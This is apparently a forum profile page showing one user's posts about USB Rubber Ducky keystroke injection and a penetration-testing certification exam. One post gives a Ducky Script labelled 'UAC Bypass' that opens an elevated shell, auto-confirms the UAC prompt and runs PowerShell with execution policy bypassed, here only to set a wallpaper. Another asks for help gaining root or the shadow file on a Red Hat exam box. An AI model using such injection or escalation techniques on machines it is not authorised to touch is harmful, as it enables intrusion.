Jump to content

Crustymonkey

Active Members
  • Posts

    12
  • Joined

  • Last visited

Posts posted by Crustymonkey

  1. (Might be best to be patient with replies. This is a pretty quiet board.) - I will keep that in mind. Thanks

    've noticed that a longer initial delay helps with the driver issue. Usually about 4s does the trick, though it depends on the speed of the computer. It seems to me that if it tries to type while the drivers are still installing, it just skips it and will keep typing the rest of your script until that happens. Other than that, why not just plug it in again after the driver has installed?

    I will try a longer delay....

    Thank you for your reply

  2. I have this Ducky Script that I pieced together and it changes the users desktop with powershell. It works well but when I install it into a new computer is starts to Install drivers then say USB is ready. Is their a way around that?

    REM *** UAC Bypass ***
    DELAY 2000
    WINDOWS r
    DELAY 200
    STRING powershell Start-Process cmd.exe -Verb runAs
    ENTER
    DELAY 500
    ALT y
    DELAY 500
    STRING powershell -ExecutionPolicy ByPass -noprofile -noninteractive -command "& {\\server\shared\wallpaper.ps1}"
    ENTER
    DELAY 200
    STRING exit
    ENTER
    POWERSHELL SCRIPT
    Add-Type @"
    using System;
    using System.Runtime.InteropServices;
    using Microsoft.Win32;
    namespace Wallpaper
    {
    public enum Style : int
    {
    Tile, Center, Stretch, NoChange
    }
    public class Setter {
    public const int SetDesktopWallpaper = 20;
    public const int UpdateIniFile = 0x01;
    public const int SendWinIniChange = 0x02;
    [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    private static extern int SystemParametersInfo (int uAction, int uParam, string lpvParam, int fuWinIni);
    public static void SetWallpaper ( string path, Wallpaper.Style style ) {
    SystemParametersInfo( SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange );
    RegistryKey key = Registry.CurrentUser.OpenSubKey("Control Panel\\Desktop", true);
    switch( style )
    {
    case Style.Stretch :
    key.SetValue(@"WallpaperStyle", "2") ;
    key.SetValue(@"TileWallpaper", "0") ;
    break;
    case Style.Center :
    key.SetValue(@"WallpaperStyle", "1") ;
    key.SetValue(@"TileWallpaper", "0") ;
    break;
    case Style.Tile :
    key.SetValue(@"WallpaperStyle", "1") ;
    key.SetValue(@"TileWallpaper", "1") ;
    break;
    case Style.NoChange :
    break;
    }
    key.Close();
    }
    }
    }
    "@
    [Wallpaper.Setter]::SetWallpaper( '\\server\shared\quacked.bmp', 2 )
  3. Hello all

    I know this questions was asked a few years but the OP decided not to post the solution for good reason. I just recently passed the written portion of the CPT exam and now I am working on the practical. The goal to get root on 2 Linux boxes. One is a CentOS that I was able to get 3 accounts including root. It was pretty easy. One of the user accounts worked on the second Linux box which is a Red Hat server running Linux Kernel 2.4.20-8. There are all kinds of services that show up on nmap but none seem to allow escalation of privileges. I tried a few kernel exploits like the sock_sendpage in metasploit but no joy. I then started reading up on SUID and thought that may be the direction to take. All I need to do it gain root on the Red Hat box or get a hold of the shadow file some how. Anyone willing to assist me with this?

    Thanks

×
×
  • Create New...